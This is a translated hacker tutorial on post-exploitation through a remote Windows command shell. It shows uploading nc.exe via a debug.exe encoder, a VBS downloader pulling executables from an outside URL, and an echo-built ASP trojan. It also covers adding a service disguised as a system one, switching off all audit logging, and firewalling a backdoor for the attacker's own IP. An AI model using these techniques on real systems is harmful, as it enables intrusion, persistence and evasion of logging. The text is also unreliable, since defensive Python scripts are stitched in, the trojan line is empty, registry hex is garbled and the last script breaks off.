Table of Contents
1. Introduction
2. File Transfer
3. System Configuration
4. Network Configuration
5. Software Installation
6. Windows Scripts
7. Demonstration
Preface

The CMD shell (command-line interaction) is an eternal topic for hackers; it has a long history and keeps growing. This article introduces and summarizes some ways to control a Windows system from the command line. As far as possible, these methods are implemented with tools that come with the system itself.

File Transfer

For a CMD shell obtained through an overflow vulnerability, the biggest problem is how to upload files. Because of the spread of worms, ports 139 and 445, which are needed to connect to IPC$, are blocked almost everywhere. In addition, Windows XP has strengthened the protection of IPC$, so uploading files through IPC$ and the default shares is basically no longer viable. FTP and TFTP are two feasible methods that this article does not cover. There are three other methods that are less well known; as a summary, I will mention them:
1. Write an ASP trojan with the echo command. The premise, of course, is that IIS is running on the target host. Typical ASP trojans are large and not suitable for writing directly with echo, so here I offer a small one. The echo version directly:
@echo ^> Up.asp
Note that this is a single line with no line break in the middle. The generated up.asp cannot be accessed with a browser; it can only be used with the following script:
@echo with wscript:if .arguments.count^<2 then .quit >dl.vbs
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error: " ^& w.status:.quit >>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs
Example: download ps.exe and save it to c:\path:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe
Note that this is executed in the remote shell.
4. Echo the file in encoded form, then restore it with a script and debug.exe. The previous methods cannot guarantee getting through a firewall. Moreover, unless you control the web server, resources on the web are generally provided as compressed archives; if the target host has no decompression tool, they are still of no use. So only the "killer move" remains!
The echo command with redirection can write characters whose ASCII code is below 128, but not those of 128 and above. So a file can be written easily on the remote host only if the local file is first "encoded" into displayable characters and reassembled there. The first thing that comes to mind is Base64, the encoding used for e-mail attachments. However, VBS does not support bit operations, so encoding and decoding are rather complicated. More troublesome is that scripts are poor at handling files as binary streams. (ADODB.Stream can write a file as a stream, but I could not construct the corresponding data type. A binary data stream can be converted to a string with the MidB function, but the reverse does not work. I spent two days and still could not solve this problem. If anyone can write arbitrary byte data to a file with VBS or JS, please advise.)
Helplessly, debug.exe has to come out. Many people know this, so I won't introduce it; here is the result directly, the encoding script:

fp = WScript.Arguments(0)
fn = Right(fp, Len(fp) - InStrRev(fp, "\"))
' read the whole file as a binary stream
With CreateObject("ADODB.Stream")
    .Type = 1: .Open: .LoadFromFile fp: str = .Read: sl = LenB(str)
End With
' file length split into the BX:CX register pair debug.exe uses for "w"
sll = sl Mod 65536: slh = sl \ 65536
With CreateObject("Scripting.FileSystemObject").OpenTextFile(fp & ".bat", 2, True)
    .Write "@echo str="""
    For i = 1 To sl
        bt = AscB(MidB(str, i, 1))
        If bt < 16 Then .Write "0"
        .Write Hex(bt)
        ' start a new echo command every 128 bytes (256 hex characters)
        If i Mod 128 = 0 Then .Write """ _>>debug.vbs" & vbCrLf & "@echo +"""
    Next
    ' debug.vbs turns the hex string into "e" (enter) commands for debug.exe
    .WriteLine """>>debug.vbs" & vbCrLf & "@echo with wscript.stdout:r=vbcrlf" _
        & ":for i=1 to len(str) step 48:.write ""e"" ^& hex(256+(i-1)/2)" _
        & ":for j=i to i+46 step 2:.write "" "" ^& mid(str,j,2):next:.write r:next>>debug.vbs"
    ' set BX:CX to the length, name the output file, write it and quit
    .WriteLine "@echo .write ""rbx"" ^& r ^& """ & Hex(slh) & """ ^& r ^& ""rcx"" ^& r ^& """ & Hex(sll) _
        & """ ^& r ^& ""n debug.tmp"" ^& r ^& ""w"" ^& r ^& ""q"" ^& r:end with>>debug.vbs" _
        & " && cscript //nologo debug.vbs | debug.exe>nul && ren debug.tmp """ & fn & """ & del debug.vbs"
End With

Save it as echo.vbs. Suppose you want to upload nc.exe; then enter the following at the local command line:

cscript echo.vbs nc.exe
You can also drag the icon of the file you want to transfer onto the icon of the script file. A moment later, nc.exe.bat is generated in the current directory. Open it with an editor such as Notepad and you will see the following:
@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000" _>>debug.vbs
@echo +"504500004C010400B98EAE340000000000000000E0000F010B01050000980000006200000000000000 4C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000" _>>debug.vbs
@echo +"002001003C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000" _>>debug.vbs
@echo +"70970000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100" _>>debug.vbs
........ (several lines omitted) ........
@echo +"">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e" ^& hex(256+(i-1)/2):for j=i to i+46 step 2:.write " " ^& mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx" ^& r ^& "0" ^& r ^& "rcx" ^& r ^& "E800" ^& r ^& "n debug.tmp" ^& r ^& "w" ^& r ^& "q" ^& r:end with>>debug.vbs && cscript //nologo debug.vbs | debug.exe>nul && ren debug.tmp "nc.exe" & del debug.vbs

Copy it, switch to the remote command-line window, and paste. If the network is not very slow, the whole upload takes about 20 seconds.
Some notes:
1. Transferring large files is unstable and the shell may die, so the smaller the file, the better. I recommend that the original file not exceed 100KB.
2. Before transferring a large file, you can send a small one first as a "warm-up", so that the 16-bit virtual machine NTVDM.EXE stays resident in the background. After all files are transferred, kill the NTVDM process.
3. Some cmd shells need two carriage returns after each command; in those, nc.exe.bat cannot be used directly.
4. The length of a single command is limited, so all the work cannot be done with a single echo. Moreover, in the cmd shell provided by nc, a slightly too long command makes it exit automatically (an overflow?). You can change the 128 in the statement "i mod 128 = 0" to adjust the length of each echo command; the number of characters in each echo is about 2.5 times this number. The decoding process does not have to involve a script; the script is used only to reduce the amount of data transmitted (the data is effectively compressed). If I have time, I will write a better script with stronger compression and a data check.
Once files can be uploaded, everything else is easy. But many tasks are more convenient with what Windows already provides; don't forget Windows itself when looking for the tools you need.
System Configuration

This section covers three aspects: the registry, services and group policy.

Let's talk about the registry first. Many command-line tools for accessing the registry are interactive. A shell produced by an overflow generally cannot redirect the input/output streams again, so they cannot be used. The regedit.exe that comes with the system is enough.
1. Reading the registry. First export the registry key you want to query, then view it with type, for example:

C:\>regedit /e 1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

C:\>type 1.reg | find "PortNumber"
"PortNumber"=dword:00000d3d

C:\>del 1.reg

So the Terminal Services port is 3389 (hexadecimal D3D).
2. Modifying/deleting registry keys. First echo a REG file, then import it, for example:

echo Windows Registry Editor Version 5.00 >1.reg
echo. >>1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
echo "TelnetPort"=dword:00000913 >>1.reg
echo "NTLM"=dword:00000001 >>1.reg
echo. >>1.reg
regedit /s 1.reg

This changes the Telnet service port to 2323 (hexadecimal 913) and the NTLM authentication mode to 1.
To delete a key, put a minus sign in front of its name, for example:

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

To delete a value, put a minus sign after the equals sign, for example:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Kavrun"=-
3. Using an INF file. The registry changes above can also be made with an INF file like the following:

[Version]
Signature="$WINDOWS NT$"

[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name

[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1

[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Kavrun

Write it to C:\path\reg.inf and then "install" it with the following command:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\path\reg.inf

Some notes:
1. [Version] and [DefaultInstall] are required, and at least one of AddReg and DelReg must be present. My_AddReg_Name and My_DelReg_Name can be named freely. 0x00010001 denotes the REG_DWORD data type; 0x00000000, or omitting the item (keeping the comma), denotes REG_SZ (string); 0x00020000 denotes REG_EXPAND_SZ. 2323 can also be written as 0x913. For more on the INF file format, see the DDK help.
2. InstallHinfSection is case-sensitive. There is only a comma between it and setupapi, no space. 128 indicates the given path; other values and their meanings are in MSDN. Note especially that the last parameter must be the full path of the INF file; do not use a relative path.
3. Items in the INF file are not case-sensitive.
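A defender reviewing an INF file found on a host wants to know exactly which registry keys it would touch and with which data types. The following Python script is an added example (not part of the original article) that decodes AddReg/DelReg lines of the form shown above, including the type flags 0x00010001 and 0x00020000; the sample INF is constructed.

```python
"""Decode the registry changes a setupapi INF would make.

Added example for the INF method above; it is not part of the original
article. It handles only the AddReg/DelReg line formats shown there
(root,subkey[,value[,flags[,data]]]). The sample INF below is constructed.
"""
import csv

# Type bits of the AddReg flags word (masked with 0xFFFF0001), as in the text:
# 0x00010001 = REG_DWORD, 0x00020000 = REG_EXPAND_SZ, 0 or omitted = REG_SZ.
REG_TYPES = {
    0x00000000: "REG_SZ",
    0x00000001: "REG_BINARY",
    0x00010000: "REG_MULTI_SZ",
    0x00010001: "REG_DWORD",
    0x00020000: "REG_EXPAND_SZ",
}
FLG_ADDREG_DELVAL = 0x00000004   # an AddReg line that actually deletes a value

SAMPLE_INF = r"""
[Version]
Signature="$WINDOWS NT$"

[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name

[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
HKLM,SOFTWARE\ExampleVendor\Agent,Path,0x00020000,"%SystemRoot%\agent.exe"

[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Kavrun
"""


def parse_sections(text):
    """Split INF text into {section name (lower-case): [lines]}; ';' starts a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def registry_changes(inf_text):
    """Return (action, key path, value name, type, data) for every registry edit."""
    sections = parse_sections(inf_text)
    version = sections.get("version", [])
    if not any(l.lower().startswith("signature=") for l in version):
        raise ValueError("INF has no [Version] Signature; setupapi would reject it")
    changes = []
    for directive in sections.get("defaultinstall", []):
        name, _, targets = directive.partition("=")
        name = name.strip().lower()
        if name not in ("addreg", "delreg"):
            continue                       # CopyFiles etc. are not registry edits
        for target in targets.split(","):
            for line in sections.get(target.strip().lower(), []):
                # csv handles the quoted data field; backslashes stay literal
                fields = next(csv.reader([line], skipinitialspace=True))
                fields += [""] * (5 - len(fields))
                root, subkey, value, flags, data = fields[:5]
                path = f"{root}\\{subkey}" if subkey else root
                if name == "delreg":
                    changes.append(("delete value" if value else "delete key",
                                    path, value, None, None))
                    continue
                fl = int(flags, 0) if flags else 0
                reg_type = REG_TYPES.get(fl & 0xFFFF0001, f"flags {fl:#010x}")
                if reg_type == "REG_DWORD" and data:
                    data = int(data, 0)    # "2323" and "0x913" both mean 2323
                action = "delete value" if fl & FLG_ADDREG_DELVAL else "set"
                changes.append((action, path, value, reg_type, data))
    return changes


if __name__ == "__main__":
    for change in registry_changes(SAMPLE_INF):
        print(*change, sep="\t")
```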
Next, services. Starting or stopping a service can be done with the net command, but adding or deleting a service requires tools such as sc, instsrv.exe or xnet.exe, which do not come with the system (XP and 2003 do include sc). Importing the registry also works, but the effect is not good, for reasons given later. So the INF file comes to the rescue again.
Add a service:
[Version]
Signature="$WINDOWS NT$"

[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name

[My_AddService_Name]
DisplayName=Windows Internet Service
Description=Support for Internet Information Services management.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe

Save it as inetsvr.inf, then:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\path\inetsvr.inf

This example adds a service called inetsvr (it looks a lot like a system service, doesn't it?).
Some explanations:
1. The last four items are: the service type: 0x10 is a stand-alone process service, 0x20 a shared process service (such as svchost); the start type: 0 loaded at system boot, 2 started automatically by the SCM (Service Control Manager), 3 manual start, 4 disabled (note that 0 and 1 can only be used for drivers); error control: 0 ignore, 1 continue and warn, 2 switch to the LastKnownGood configuration, 3 blue screen; the service location: %11% is the System32 directory, %10% the system directory (WINNT or Windows), %12% the driver directory System32\Drivers. See the DDK for other values. You can also use a full path directly instead of a variable. These four items are mandatory.
2. Besides the six items in the example, there are also LoadOrderGroup, Dependencies and so on. They are not often used, so I won't introduce them.
3. There are two commas after inetsvr because an uncommon parameter, Flags, sits between them.
Delete a service:
[Version]
Signature="$WINDOWS NT$"

[DefaultInstall.Services]
DelService=inetsvr
Very simple, isn't it?
Of course, you can also reach the goal by importing the registry, but INF has its own advantages:
1. Export the registry key of a service that comes with the system and you will find its execution path looks like this: "ImagePath"=hex(2):25, 00, 53, 00, 79, 100, 73, 00, 74, 00, 65, 6D, 00, 52, 100, 6F, 00, 6F, 00, / 74, 200, 5, 5C, 00, 73, 100, 79, 100, 73, 100, 74, 00 65,00, 6d, 00, 33, 100, 32, 100, 5c, 00, 74, / 00, 6C, 00, 6E, 00, 74, 3, 73, 100, 76, 100, 72, 100, 2E, 00, 65, 00, 78, 00, 65, 00, 00, and 100. The readability is too poor. It is actually %SystemRoot%\system32\tlntsvr.exe, but the data type is REG_EXPAND_SZ. Such a path is obviously inconvenient to enter by hand when adding a service by importing a REG file.
2. Most importantly, like tools such as sc, an INF file takes effect immediately, whereas after importing a REG file a restart is required.
3. The INF file automatically adds a Security subkey under the service's registry key, so it looks more like a service that comes with the system.
In addition, AddService and DelService, as well as AddReg and DelReg, can be used at the same time and repeatedly, so you can add and delete several services and registry items at once. For details, see the DDK.
Finally, group policy. Group Policy is an important means of establishing a secure Windows environment, especially in a Windows domain. A good system administrator should be able to master and apply group policy. Under the GUI, group policy is accessed with gpedit.msc; on the command line, with secedit.exe. First look at the secedit command syntax:

secedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy

The five commands respectively analyze group policy, configure group policy, export group policy, validate template syntax and refresh group policy. In XP/2003, secedit /refreshpolicy is replaced by gpupdate. Check the specific syntax of these commands yourself on the command line.
Unlike the registry, where a REG file alone is enough, accessing group policy involves not only a template file (also an INF) but also a security database file (SDB). To modify group policy, you must first import the template into the security database and then apply the security database to refresh the group policy. Let's look at an example:
Suppose I want to set the minimum password length to 6 and enable "Password must meet complexity requirements"; then write this template:

[Version]
signature="$CHICAGO$"

[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1

Save it as gp.inf, then import it:

secedit /configure /db gp.sdb /cfg gp.inf /quiet

After this command runs, a gp.sdb is generated in the current directory; it is an "intermediate product" and can be deleted. The /quiet parameter means "quiet mode": no log is generated. But in my tests this parameter does not seem to work on 2000 SP4, while it is fine on XP. The log is always saved to %windir%\security\logs\scesrv.log. You can also specify the log yourself so that you can delete it afterwards, such as:

secedit /configure /db gp.sdb /cfg gp.inf /log gp.log
del gp.*
In addition, before importing the template, you can analyze if the grammar is correct:
secedit /validate gp.inf
So how do you learn the specific syntax? Of course, look it up in MSDN. There is also a lazy way: the system comes with some security templates in the %windir%\security\templates directory. Open these templates; they contain basically all the commonly used security settings and are easy to understand.
Another example: turn off all "audit policies" (the events they audit are recorded in the "Security" log of the Event Viewer). Echo version:

echo [Version] >1.inf
echo signature="$CHICAGO$" >>1.inf
echo [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
echo AuditPolicyChange=0 >>1.inf
echo AuditAccountManage=0 >>1.inf
echo AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
echo AuditAccountLogon=0 >>1.inf
echo AuditLogonEvents=0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
del 1.*

Perhaps someone will say: isn't group policy saved in the registry? Why not modify the registry directly? Because not all group policies are saved in the registry. "Audit policy", for example, is not. You can compare the registry before and after changing the policy with RegSnap; in my test nothing changed. Only "Administrative Templates" are based entirely on the registry. And once you know the exact location, neither method is complicated.
For example, "Local Policies" / "Security Options" in XP and 2003 adds a "sharing and security model for local accounts" policy, whose default on XP is "Guest only". That is why connecting to IPC$ with the administrator account still gets only Guest rights. You can change it to "Classic" by importing a REG file:

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "ForceGuest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg

The corresponding INF is:

echo [Version] >1.inf
echo signature="$CHICAGO$" >>1.inf
echo [Registry Values] >>1.inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*
On reading group policy from the command line: the default security database is %windir%\security\database\secedit.sdb. Export it to an INF file:

secedit /export /cfg gp.inf /log 1.log

When the /db parameter is not given, the default database is used. Then view gp.inf.

However, this is only part of the group policy (namely "Windows Settings"). Moreover, a policy that is not configured is not exported. For example, "Rename administrator account" appears in the INF file as NewAdministratorName="***" only if it has been defined. The other group policies, which cannot be exported, can only be obtained by accessing the registry.
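The INF that secedit /export writes (and the templates above) can be checked mechanically for weak settings before they are applied or after they are found on a host. The following Python script is an added example, not from the original article: it reads the [System Access], [Event Audit] and [Registry Values] sections in that format (a registry value is written as "type,data", e.g. 4,0 for a REG_DWORD 0) and reports disabled auditing, a short minimum password length and a ForceGuest change. The sample template and the threshold of 8 characters are this example's own assumptions.

```python
"""Review a secedit security template for weak settings.

Added example for the secedit templates discussed above; it is not part of
the original article. It reads the [System Access], [Event Audit] and
[Registry Values] sections in the form secedit /export writes them (a
registry value is "type,data", e.g. 4,0 = REG_DWORD 0). The sample template
and the thresholds used are this example's own assumptions.
"""
import configparser

SAMPLE_TEMPLATE = r"""
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1
NewAdministratorName = "***"
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 3
AuditObjectAccess = 0
AuditPolicyChange = 0
AuditAccountLogon = 2
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
"""

# Audit settings are a bit mask: 1 = success, 2 = failure.
AUDIT_NAMES = {0: "none", 1: "success", 2: "failure", 3: "success and failure"}
# Registry value types as numbered in [Registry Values] lines.
REG_TYPE_NAMES = {1: "REG_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}
MIN_PASSWORD_LENGTH = 8          # assumed baseline for this example


def load_template(text):
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       delimiters=("=",))
    parser.optionxform = str      # keep the case of setting names and registry paths
    parser.read_string(text)
    return parser


def decode_registry_value(raw):
    """'4,0' -> ('REG_DWORD', 0); non-DWORD data keeps its text."""
    type_str, _, data = raw.partition(",")
    reg_type = int(type_str)
    if reg_type == 4:
        data = int(data)
    return REG_TYPE_NAMES.get(reg_type, f"type {reg_type}"), data


def review(text):
    """Return a list of human-readable findings about weak or notable settings."""
    parser = load_template(text)
    findings = []
    if parser.has_section("System Access"):
        access = parser["System Access"]
        min_len = int(access.get("MinimumPasswordLength", "0"))
        if min_len < MIN_PASSWORD_LENGTH:
            findings.append(f"MinimumPasswordLength is {min_len} (below {MIN_PASSWORD_LENGTH})")
        if access.get("PasswordComplexity", "0") != "1":
            findings.append("PasswordComplexity is not enforced")
    if parser.has_section("Event Audit"):
        for name, value in parser["Event Audit"].items():
            if AUDIT_NAMES.get(int(value)) == "none":
                findings.append(f"{name} is not audited")
    if parser.has_section("Registry Values"):
        for path, raw in parser["Registry Values"].items():
            reg_type, data = decode_registry_value(raw)
            if path.lower().endswith(r"\lsa\forceguest") and data == 0:
                findings.append("ForceGuest=0: sharing and security model set to Classic "
                                "(XP default is Guest only)")
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_TEMPLATE):
        print("-", finding)
```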
This approach does not work on XP and 2003: the export succeeds, but the content is empty, for unknown reasons. According to official information, XP and 2003 display group policy through RSoP (Resultant Set of Policy); the corresponding command-line tool is gpresult. However, it obtains the group policy applied (from the domain) when the system starts, and the result on a stand-alone machine is still "empty". So if you want to know whether certain group policies are set, the only way is to write an INF template, run secedit /analyze, and then view the log.

Network Configuration

Windows comes with many command-line network tools. Everyone is familiar with ping, tracert, ipconfig, telnet, ftp, tftp and netstat; less familiar are nbtstat, pathping, nslookup, finger, route, netsh... These commands fall into three categories: network probing (such as ping), network connection (such as telnet) and network configuration (such as netsh). The first two are relatively simple, so this article only introduces two network configuration tools.
Netsh. To use netsh in a remote shell, the problem of interactive mode must be solved first. As mentioned earlier, many shells cannot redirect input/output again, so interactive command-line tools such as ftp cannot be used in this environment. The solution is that interactive tools generally accept a script (or response file), for example ftp -s:filename. The same applies to netsh: netsh -f filename.
Netsh has many features: it can configure IAS, DHCP, RAS, WINS, NAT server, the TCP/IP protocol, the IPX protocol, routing and so on. We are not administrators and don't need to know all that; just use netsh to learn the network configuration of the target host.
1. TCP/IP configuration

echo interface ip >s
echo show config >>s
netsh -f s
del s

This tells you whether the host has several network cards and IP addresses, whether its IP is dynamically assigned (DHCP), and what its intranet IP is (if any). The command is similar to ipconfig /all.

Note that the following commands require the RemoteAccess service to be running on the target host. If it is disabled, first enable it by importing the registry, then run net start RemoteAccess.
2. ARP

echo interface ip >s
echo show ipnet >>s
netsh -f s
del s

This gives more information than arp -a.

3. TCP/UDP connections

echo interface ip >s
echo show tcpconn >>s
echo show udpconn >>s
netsh -f s
del s

This group of commands is equivalent to netstat -an.

4. Network card information. If every netsh command had a substitute, why would netsh exist? This one has no substitute.

echo interface ip >s
echo show interface >>s
netsh -f s
del s

Other netsh features, such as changing the IP address, are generally not needed, so they are omitted here.
IPsec. First, it must be pointed out that IPsec and TCP/IP filtering are different things; don't confuse them. TCP/IP filtering is very limited, far less flexible and powerful than IPsec. Now let's see how to control IPsec from the command line. XP uses ipseccmd, 2000 uses ipsecpol. Unfortunately, neither comes with the system: ipseccmd is in Support\Tools\support.cab on the XP installation disc, and ipsecpol is in the 2000 Resource Kit. Moreover, ipsecpol needs two other files, ipsecutil.dll and text2pol.dll; the three files total 119KB.
IPsec can be controlled by group policy, but I searched MSDN and found no syntax for the corresponding security template, and a configured IPsec policy cannot be exported as a template either. So group policy is out. IPsec settings are saved in the registry (HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local), so in principle IPsec could be configured by modifying the registry, but much of the information is stored in binary form, which is hard to read and modify. By comparison, uploading the command-line tool is more convenient.
There is a lot of information online about ipsecpol and ipseccmd, so this article does not go into detail and just lists some practical examples. For setting IPsec policies, the syntax of ipseccmd is almost identical, so only ipsecpol is shown:
1. Defending against RPC-DCOM attacks

ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:TCP *+0:135:UDP *+0:137:UDP *+0:138:UDP *+0:139:TCP *+0:445:TCP *+0:445:UDP -n BLOCK -w reg -x

This command closes TCP ports 135, 139, 445 and UDP ports 135, 137, 138, 445 on the local host. The specifics:
-p myfirewall: specifies the policy name myfirewall.
-r rpc-dcom: specifies the rule name rpc-dcom.
-f ...: creates 7 filters. * means any address (source); 0 means this host's address (destination); + means a mirrored (two-way) filter. See ipsecpol -? for the detailed syntax.
-n BLOCK: sets the filter action to "block". Note that BLOCK must be uppercase.
-w reg: writes the configuration to the registry so that it remains in effect after a restart.
-x: activates the policy immediately.
2. Preventing ping

ipsecpol -p myfirewall -r antiping -f *+0::ICMP -n BLOCK -w reg -x

If a policy named myfirewall already exists, the antiping rule is added to it. Note that this rule also prevents the host from pinging others.
3. IP restrictions for a backdoor. Suppose you have installed DameWare Mini Remote Control on a host. To protect it from being brute-forced or overflowed by others, access to its service port 6129 should be restricted.

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:TCP -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:TCP -n PASS -w reg -x

This allows only 123.45.67.89 to access port 6129 on the host. If your IP is dynamic, set the rule according to the range of IPs assigned, such as:

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:TCP -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:TCP -n PASS -w reg -x

This allows the IPs 123.45.67.1 through 123.45.67.254 to access port 6129.
Be especially careful when writing rules; don't block yourself. If you are not sure what effect a rule will have, you can first "leave yourself a way out" with a scheduled task. For example:

C:\>net start schedule
The Task Scheduler service is starting..
The Task Scheduler service was started successfully.

C:\>time /t
12:34

C:\>at 12:39 ipsecpol -p myfw -y -w reg
Added a new job with job ID = 1

Then you have 5 minutes to set up the myfw policy and test it. After 5 minutes, the scheduled task stops the policy. If the test results are not ideal, delete the policy:

C:\>ipsecpol -p myfw -o -w reg

Note that before deleting a policy you must make sure it has been stopped. If it is not stopped, it will continue to take effect for a period of time even after deletion. The duration depends on the policy refresh interval, which defaults to 180 minutes.

If the test passes, enable it:

C:\>ipsecpol -p myfw -x -w reg
Finally, viewing IPsec policies. On XP it is very simple, a single command: ipseccmd show filters. ipsecpol has no query function, so another command-line tool, netdiag, is needed. It is in Support\Tools\support.cab on the 2000 installation disc. (Having already uploaded three files, one more doesn't matter.)
netdiag requires the RemoteRegistry service, so start that service first:

net start RemoteRegistry
If you don't start RemoteRegistry, you will get an error:
Failed to get system information of this machine.
netdiag is a very powerful tool that can obtain all kinds of network information. However, its output is sometimes too detailed and exceeds the output buffer of the console cmd.exe, and not every remote cmd shell can pipe it through the more command.

The command to view the IPsec policy is: netdiag /debug /test:ipsec

A long stream of output follows; the IPsec policy is at the end.
Software Installation

Installing a piece of software or a tool generally does just two things: copying files to specific directories and modifying the registry. Once you know the specifics, you can do it from the command line. (Registration and activation after installation are not considered.)
WinPcap is a very common tool, but it must be installed through the GUI. You can find a version that doesn't need the GUI (but it has a copyright page); in fact, we can make one ourselves.
Take WinPcap 3.0a as an example. By comparing file-system and registry snapshots before and after installation, the whole process is easy to understand. Leaving aside the uninstall part, there are three key files: wpcap.dll, packet.dll and npf.sys. The first two go in the System32 directory, the third in System32\Drivers. The registry change is the addition of a system service, NPF. Note that this is a system service (a driver), not a Win32 service. As a system service, it is likewise added as a key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services, which by default only the SYSTEM identity can fully access. Fortunately, it does not need to be added manually; WinPcap sets it up automatically. In fact, you don't even need to modify the registry by hand: WinPcap completes everything itself, and you only need to copy the three files to the right places.
As an example, or rather to demonstrate how to modify the registry, use the INF method shown earlier:

[Version]
Signature="$WINDOWS NT$"

[DefaultInstall.Services]
AddService=NPF,,winpcap_svr

[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys

Save the above as _wpcap_.inf. Then write a batch file _wpcap_.bat:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
if /i "%CD%"=="%SYSTEMROOT%\system32" goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
del wpcap.dll
:COPYDRV
if /i "%CD%"=="%SYSTEMROOT%\system32\drivers" goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
:END
del %0

Then use WinRAR to pack all (5) files into a self-extracting EXE, set "Advanced SFX options" / "Run after extraction" to _wpcap_.bat, and the command-line WinPcap installation package is done.

Note that the last line of the batch file has no carriage return; otherwise the batch file will not be deleted, because it is still running.
Basically all software installations can follow this idea. There is one exception, though: installing system patches. Fortunately, Windows patches support command-line installation. For example:

KB824146.exe -n -z -q

-n: do not keep backup files; -z: do not restart; -q: quiet mode.

If there is a pile of patches to apply, pack them with RAR into a self-extracting file together with a batch file:

for %%f in (KB??????.exe) do %%f -n -z -q
for %%f in (KB??????.exe) do del %%f
del %0
Windows Scripts

Many things can be done with scripts. Here are echo versions of several commonly used scripts.

1. Display the system version

@echo for each ps in getobject _>ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_operatingsystem").instances_ >>ps.vbs
@echo wscript.echo ps.caption ^& " " ^& ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
2. List processes

@echo for each ps in getobject _>ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle ^& vbtab ^& ps.name ^& vbtab ^& ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs
3. Terminate a process

@echo for each ps in getobject _>pk.vbs
